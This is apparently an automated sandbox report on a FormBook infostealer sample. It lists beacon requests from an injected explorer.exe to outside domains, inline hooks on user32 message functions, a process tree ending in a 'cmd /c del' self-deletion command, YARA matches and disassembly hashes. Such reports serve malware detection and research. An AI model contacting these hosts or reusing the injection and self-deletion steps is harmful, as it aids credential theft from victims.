0	192.168.2.5	49746	184.154.50.243	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 27, 2020 06:37:46.629072905 CET	5535	OUT	GET /unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0q HTTP/1.1 Host: www.porncamslivechat.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 27, 2020 06:37:48.018973112 CET	5536	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Nov 2020 05:37:46 GMT Server: Apache Link: <https://porncamslivechat.com/wp-json/>; rel="https://api.w.org/" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=1d6c5c8d17388afcc8a5932da9c3f004; path=/ Upgrade: h2,h2c Connection: Upgrade, close Referrer-Policy: no-referrer-when-downgrade Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 33 64 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 6f 2d 63 61 6d 2d 6d 75 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 2e 70 6e 67 22 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 69 66 79 2f 32 66 36 38 32 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 6f 2d 63 61 6d 2d 6d 75 2f 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 69 66 79 2f 62 66 66 64 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 35 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 Data Ascii: 3d48<!doctype html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="apple-touch-icon" href="http://porncamslivechat.com/wp-content/themes/pro-cam-mu/images/icon.png"><link rel="stylesheet" href="http://porncamslivechat.com/wp-content/cache/minify/2f682.css" media="all" /><link rel="pingback" href="http://porncamslivechat.com/xmlrpc.php" />...[if lt IE 9]><script src="http://porncamslivechat.com/wp-content/themes/pro-cam-mu/js/html5.js" type="text/javascript"></script><![endif]--><script src="http://porncamslivechat.com/wp-content/cache/minify/bffd0.js"></script>... This site is optimized with the Yoast SEO plugin v15.3 - https://yoast.com/wordpress/plugins/s
Nov 27, 2020 06:37:48.019009113 CET	5538	IN	Data Raw: 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 50 6f 72 6e 20 43 61 6d 73 20 77 69 74 68 20 4c 69 76 65 20 43 68 61 74 20 2d 20 31 30 30 30 73 20 6f 66 20 4c 69 76 65 20 50 6f 72 6e 20 43 61 6d Data Ascii: eo/ --><title>Page not found - Porn Cams with Live Chat - 1000s of Live Porn Cams with chat for you</title><meta name="robots" content="noindex, follow" /><meta property="og:locale" content="en_US" /><meta property="og:title" content="
Nov 27, 2020 06:37:48.019030094 CET	5539	IN	Data Raw: 64 22 3a 22 23 46 46 46 22 2c 22 62 6f 72 64 65 72 22 3a 22 23 62 31 61 36 61 36 63 32 22 2c 22 62 6f 72 64 65 72 5f 6f 6e 22 3a 22 22 2c 22 62 75 74 74 6f 6e 5f 31 5f 62 75 74 74 6f 6e 5f 63 6f 6c 6f 75 72 22 3a 22 23 36 31 61 32 32 39 22 2c 22 Data Ascii: d":"#FFF","border":"#b1a6a6c2","border_on":"","button_1_button_colour":"#61a229","button_1_button_hover":"#4e8221","button_1_link_colour":"#fff","button_1_as_button":"1","button_1_new_win":"","button_2_button_colour":"#333","button_2_button_ho
Nov 27, 2020 06:37:48.019047976 CET	5541	IN	Data Raw: 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d Data Ascii: in\/admin-ajax.php"};/* ... */</script><script src="http://porncamslivechat.com/wp-content/cache/minify/a6c57.js"></script><link rel="https://api.w.org/" href="https://porncamslivechat.com/wp-json/" /><link rel="EditURI" type="applicatio
Nov 27, 2020 06:37:48.019074917 CET	5542	IN	Data Raw: 6e 2d 73 69 67 6e 75 70 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 3b 7d 0d 0a 2e 6e 61 76 62 61 72 20 6c 69 20 3e 20 61 20 7b 63 6f 6c 6f 72 3a 20 3b 7d 0d 0a 2e 6e 61 76 62 61 72 20 6c 69 3a 68 6f 76 65 72 20 3e 20 61 20 7b 63 6f 6c 6f 72 3a Data Ascii: n-signup:hover {color: ;}.navbar li > a {color: ;}.navbar li:hover > a {color: ;}.tab-area .tabs > a.active {color: ;}.sidebar h4 {color: ;}.tab-area .tabs > a.active svg .cls-1 {stroke: ;}.sidebar ul > li > a:hover {color: ;}.ta
Nov 27, 2020 06:37:48.019104004 CET	5543	IN	Data Raw: 2e 62 74 6e 2d 70 72 6f 66 69 6c 65 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 3b 7d 0d 0a 2e 6d 73 67 2d 62 74 6e 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 3b 7d 0d 0a 2e 70 61 67 69 6e 61 74 69 6f 6e 20 6c 69 2e 63 75 72 72 65 6e 74 20 3e Data Ascii: .btn-profile:hover {color: ;}.msg-btn:hover {color: ;}.pagination li.current > a {background-image: linear-gradient(0deg, 26%, 63%);}.pagination li.current > a {color: ;}.pagination li.current:hover > a {color: ;}.footer-top { back
Nov 27, 2020 06:37:48.019130945 CET	5545	IN	Data Raw: 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 3b 7d 0d 0a 2e 70 6f 73 74 65 64 2d 6f 6e 2c 20 2e 70 6f 73 74 65 64 2d 6f 6e 20 73 70 61 6e 20 7b 63 6f 6c 6f 72 3a 20 3b 7d 0d 0a 2e 70 6f 73 74 65 64 2d 6f 6e 20 61 20 7b 63 6f 6c 6f 72 3a 20 3b 7d 0d 0a 2e Data Ascii: ound-color: ;}.posted-on, .posted-on span {color: ;}.posted-on a {color: ;}.posted-on a:hover {color: ;}#tag-title h1 {color: ;}#tag-title h1 a {color: ;}#tag-title h1 a:hover {color: ;}article h1 a {color: ;}article h1 a:hover
Nov 27, 2020 06:37:48.019155025 CET	5546	IN	Data Raw: 74 6e 2d 64 61 72 6b 3a 68 6f 76 65 72 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 3b 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 2e 72 65 63 65 6e 74 63 Data Ascii: tn-dark:hover {background-color: ;}</style> <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style><script type="text/javascript">var cli_flush_cache = true;</scr
Nov 27, 2020 06:37:48.019174099 CET	5547	IN	Data Raw: 6f 6e 22 20 73 69 7a 65 73 3d 22 33 38 34 78 33 38 34 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 6f 2d 63 61 6d 2d 6d 75 Data Ascii: on" sizes="384x384" href="http://porncamslivechat.com/wp-content/themes/pro-cam-mu/images/icons/icon-384x384.png"/><link rel="apple-touch-icon" sizes="512x512" href="http://porncamslivechat.com/wp-content/themes/pro-cam-mu/images/icons/icon-
Nov 27, 2020 06:37:48.019191980 CET	5549	IN	Data Raw: 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 6f 2d 63 61 6d 2d 6d 75 2f 69 6d 61 67 65 73 2f 6d 65 6e 75 2e 70 6e 67 22 20 61 6c 74 3d 22 53 65 61 72 Data Ascii: ttp://porncamslivechat.com/wp-content/themes/pro-cam-mu/images/menu.png" alt="Search" /> </a> <a href="javascript:void(0)" class="mobile-search"> <img src="http://porncamslivechat.com/wp-content

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49747	23.27.109.19	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 27, 2020 06:38:07.894825935 CET	5550	OUT	GET /unx5/?YBZpk4k0=1w0hMOl97180k8Du4bGC2gk65X6wFt6LICq9bRyB5mmRHYVxdYOusOKtXf2j62HHiftJ&Wt=LhnLHro0q HTTP/1.1 Host: www.amarilloautoexpress.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 27, 2020 06:38:08.068506002 CET	5551	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Server: Nginx Microsoft-HTTPAPI/2.0 X-Powered-By: Nginx Date: Fri, 27 Nov 2020 05:38:20 GMT Connection: close Data Raw: 33 0d 0a ef bb bf 0d 0a Data Ascii: 3
Nov 27, 2020 06:38:08.068561077 CET	5552	IN	Data Raw: 31 30 35 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 43 61 63 68 65 2d Data Ascii: 105E<!DOCTYPE html><html><head><meta charset=UTF-8 /><meta http-equiv=Cache-Control content=no-siteapp /><meta http-equiv=Cache-Control content=no-transform /><meta name=applicable-device content=pc,mobile /><meta name=viewport conten
Nov 27, 2020 06:38:08.068598032 CET	5553	IN	Data Raw: 2d 62 74 6e 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 35 36 35 36 3b 0a 09 68 65 69 67 68 74 3a Data Ascii: -btn {display: block;border-radius: 10px;background-color: #ff5656;height: 55px;line-height: 55px;width: 286px;color: #fff;font-size: 20px;text-decoration: none;letter-spacing: 2px}.alert-btn:hover {background-color: #
Nov 27, 2020 06:38:08.068630934 CET	5555	IN	Data Raw: 68 74 6d 6c 22 3e e7 82 b9 e5 87 bb e8 bf 9b e5 85 a5 e8 b4 ad e5 bd a9 e5 a4 a7 e5 8e 85 3c 2f 61 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 2d 66 6f 6f 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 3c Data Ascii: html"></a></div><div class="alert-footer clearfix"></div></div><script type="text/javascript"> var totalTime = 2; var levelTime = totalTime; var str1 = ""; var str2 = "
Nov 27, 2020 06:38:08.068656921 CET	5555	IN	Data Raw: 6d 65 28 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 74 69 6d 65 72 20 3d 20 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 30 20 3d 3d 20 6c 65 76 65 6c 54 69 6d 65 Data Ascii: me(); var timer = setInterval(function () { if (0 == levelTime) { clearTimeout(timer); document.getElementById("js-alert-head").in

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8F 0xFE 0xEA
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x87 0x7E 0xEA
GetMessageW	INLINE	0x48 0x8B 0xB8 0x87 0x7E 0xEA
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8F 0xFE 0xEA

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: emthree.exe PID: 4600 Parent PID: 5660

General

Start time:	06:36:03
Start date:	27/11/2020
Path:	C:\Users\user\Desktop\emthree.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\emthree.exe'
Imagebase:	0xf40000
File size:	459776 bytes
MD5 hash:	25B5788669A3A8F35596CE975F0823A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: emthree.exe PID: 5772 Parent PID: 4600

General

Start time:	06:36:10
Start date:	27/11/2020
Path:	C:\Users\user\Desktop\emthree.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x460000
File size:	459776 bytes
MD5 hash:	25B5788669A3A8F35596CE975F0823A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3472 Parent PID: 5772

General

Start time:	06:36:12
Start date:	27/11/2020
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6240 Parent PID: 3472

General

Start time:	06:36:25
Start date:	27/11/2020
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe
Imagebase:	0xac0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6256 Parent PID: 6240

General

Start time:	06:36:29
Start date:	27/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\emthree.exe'
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6264 Parent PID: 6256

General

Start time:	06:36:30
Start date:	27/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff797770000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: emthree.exe PID: 4600 Parent PID: 5660 emthree.exeCOMMON

Executed Functions

Function 032ADDF0, Relevance: 1.6, APIs: 1, Instructions: 127COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 032AFE4A

Memory Dump Source

Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e19a7397cdd5bcc97384a20d13b0353aea8f90831a25f7c8ab9e4644f19bb891
Instruction ID: 285bb7254e01fdf505fecd4ebab43664895f80cf5105dd006bedbb8b2be22ee5
Opcode Fuzzy Hash: e19a7397cdd5bcc97384a20d13b0353aea8f90831a25f7c8ab9e4644f19bb891
Instruction Fuzzy Hash: BA5122B1C14348AFDB15CFA9C984ACEFFB1BF89310F24852AE418AB211D7749885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 032AFD2C, Relevance: 1.6, APIs: 1, Instructions: 119COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 032AFE4A

Memory Dump Source

Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 3068e0833c9afe3b4d3ec5d7abd5549797dbce52dc2b607181642b83ac1ec918
Instruction ID: 077e8e990436cce5e85bde4fd4bbfc42f2d83481e472a6a44426bca4be435b8a
Opcode Fuzzy Hash: 3068e0833c9afe3b4d3ec5d7abd5549797dbce52dc2b607181642b83ac1ec918
Instruction Fuzzy Hash: 4751D0B1D10749AFDF14CFA9C984ADDFBB1BF88314F24852AE819AB210D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 032ADE0C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 032AFE4A

Memory Dump Source

Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9321a7c4aa4284f241ef88841d217a1c470bc11550706b2433005b019784bbf0
Instruction ID: 3af0843cb60d9a9ec721f7e6f64d18035f13f2beb87999a11a0f2166c54bb4a2
Opcode Fuzzy Hash: 9321a7c4aa4284f241ef88841d217a1c470bc11550706b2433005b019784bbf0
Instruction Fuzzy Hash: B351EFB1D10709AFDF14CF99C984ADEFBB5BF88314F24852AE819AB210D7749885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 032A5364, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 032A5421

Memory Dump Source

Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d3175fe271ef4c4d9db63e37dc0905f0ad72f65d10de5f43b5e95c3f3bbd6f02
Instruction ID: eabec06aa51833d79cbab29e0669866fc96eda1b249d2e8905168b41c5f89d53
Opcode Fuzzy Hash: d3175fe271ef4c4d9db63e37dc0905f0ad72f65d10de5f43b5e95c3f3bbd6f02
Instruction Fuzzy Hash: FC412671C0461DCFDB24CFA9C944BCEBBB1BF8A308F258069D408AB251D7755989CF90

Uniqueness

Uniqueness Score: -1.00%

Function 032A3DE8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 032A5421

Memory Dump Source

Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 511d9b978924b1b0a9d31169ae8ab899bc45d672bca7d3014e7a61893051143e
Instruction ID: 3eb449961ddd521d7cabbaea75ca87d0318e8a7eaf05641f5a08d9ba8b9ed7de
Opcode Fuzzy Hash: 511d9b978924b1b0a9d31169ae8ab899bc45d672bca7d3014e7a61893051143e
Instruction Fuzzy Hash: 0E411570C1461DCFDB10DFA9C9487CEBBB1BF8A308F258069D408AB251D7B55985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 032A9840, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,032AB8BE,?,?,?,?,?), ref: 032AB97F

Memory Dump Source

Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c2b5081aef8572ac4f15aafdea0e2468429b64de6dd348a12c417710fd287ab8
Instruction ID: 2e0c67035fa7315976bf8eebf26755c9cb9024a3e123e629eca3c4f294987c21
Opcode Fuzzy Hash: c2b5081aef8572ac4f15aafdea0e2468429b64de6dd348a12c417710fd287ab8
Instruction Fuzzy Hash: BB2105B59143499FDB10CFA9D484AEEBBF4EB58350F14841AE914A7310D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 032AB8F2, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,032AB8BE,?,?,?,?,?), ref: 032AB97F

Memory Dump Source

Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d97372b6a2f7f64a688bffe8a99919a407470694359ae651be91465b915e5218
Instruction ID: 3dbb765fde22a5839ab69a720eb60f60c4c764785c5e35e7ae47472a69cce76f
Opcode Fuzzy Hash: d97372b6a2f7f64a688bffe8a99919a407470694359ae651be91465b915e5218
Instruction Fuzzy Hash: 0421FFB5901209AFDB10CFA9D884AEEBBF4EB58320F14841AE919A3310C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 032A94B8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,032A9991,00000800,00000000,00000000), ref: 032A9BA2

Memory Dump Source

Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af8829392812b46f905db6e94972c06bd12c242a126f699fffca18ca94c776bb
Instruction ID: f1938e42ad82ad16ecaaeb18d62ba3a26d4d51029d7fab7ca751a9c533ab1171
Opcode Fuzzy Hash: af8829392812b46f905db6e94972c06bd12c242a126f699fffca18ca94c776bb
Instruction Fuzzy Hash: A51156B28103498FDF10CF9AC444BDEFBF4EB98364F04842AE915AB600C374A585CFA1

Uniqueness

Uniqueness Score: -1.00%

